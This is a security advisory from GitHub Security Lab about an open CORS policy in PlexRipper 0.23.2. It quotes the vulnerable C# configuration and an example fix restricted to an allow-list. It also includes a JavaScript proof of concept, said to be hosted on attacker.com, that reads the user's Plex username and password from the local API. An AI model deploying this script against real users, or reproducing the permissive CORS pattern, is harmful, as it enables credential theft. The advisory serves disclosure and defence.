Coordinated Disclosure Timeline

Summary

PlexRipper’s open CORS policy allows attackers to gain sensitive information from PlexRipper by getting the user to access the attacker’s domain.

Project

PlexRipper

Tested Version

0.23.2

Details

API leak due to open CORS policy (GHSL-2024-305)

PlexRipper allows any website to make credentialed cross-site requests to its API. An attacker-controlled website can therefore read the response of the /api/PlexAccount endpoint and steal the user's Plex login.

    public static void ConfigureServices(this IServiceCollection services, IWebHostEnvironment env)
    {
        // Set CORS Configuration
        services.AddCors(options =>
        {
            options.AddPolicy(
                CORSConfiguration,
                builder =>
                {
                    // TODO CORS disabled, otherwise its not working when deployed in a docker container
                    // Solution?
                    builder
                        .AllowAnyHeader()
                        .AllowAnyMethod()
                        // The combo all origin is allowed with allow credentials is needed to make SignalR work from the client.
                        .SetIsOriginAllowed(_ => true)
                        .AllowCredentials();
                }
            );
        });
    }
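The following is an added example of how the policy above can be restricted to an explicit origin allow-list; it is not PlexRipper's code. The policy name value, the `Cors:AllowedOrigins` configuration key and the `http://localhost:8989` default are assumptions.

```csharp
using Microsoft.AspNetCore.Builder;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;

public static class CorsSetup
{
    // Same policy name as the vulnerable snippet; the string value is an assumption.
    public const string CORSConfiguration = "CORSConfiguration";

    public static void ConfigureCors(this IServiceCollection services, IConfiguration config)
    {
        // Allow-list read from configuration, e.g. appsettings.json:
        //   "Cors": { "AllowedOrigins": [ "http://localhost:8989" ] }
        // The key and the default origin are assumptions for this example.
        var allowedOrigins = config.GetSection("Cors:AllowedOrigins").Get<string[]>()
                             ?? new[] { "http://localhost:8989" };

        services.AddCors(options =>
        {
            options.AddPolicy(CORSConfiguration, builder =>
            {
                builder
                    // Explicit origins replace SetIsOriginAllowed(_ => true).
                    // ASP.NET Core throws if AllowAnyOrigin() is combined with
                    // AllowCredentials(), but an always-true origin predicate
                    // sidesteps that check, which is what the original code did.
                    .WithOrigins(allowedOrigins)
                    .AllowAnyHeader()
                    .AllowAnyMethod()
                    // Credentials are still allowed, but only for the listed origins,
                    // which is sufficient for SignalR from the app's own front end.
                    .AllowCredentials();
            });
        });
    }
}
```

With this policy the browser will not expose the /api/PlexAccount response to attacker.com; note that CORS restricts which origins may read responses and is not a substitute for authenticating the API itself.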

Impact

This issue may lead to Information Disclosure.

Proof Of Concept

If an attacker hosts the following JavaScript on their website attacker.com, any PlexRipper user visiting attacker.com may have their credentials stolen. This proof of concept displays the user's Plex username and password.

<script>
fetch("http://localhost:8989/api/PlexAccount", {
    method: "GET",
})
.then(response => {
    if (!response.ok) {
        throw new Error('Network response was not ok ' + response.statusText);
    }
    return response.json();
})
.then(data => alert("Plex Username: " + data.value[0]["username"] + " Plex Password: " + data.value[0]["password"])) 
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>

CVE

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-305 in any communication regarding this issue.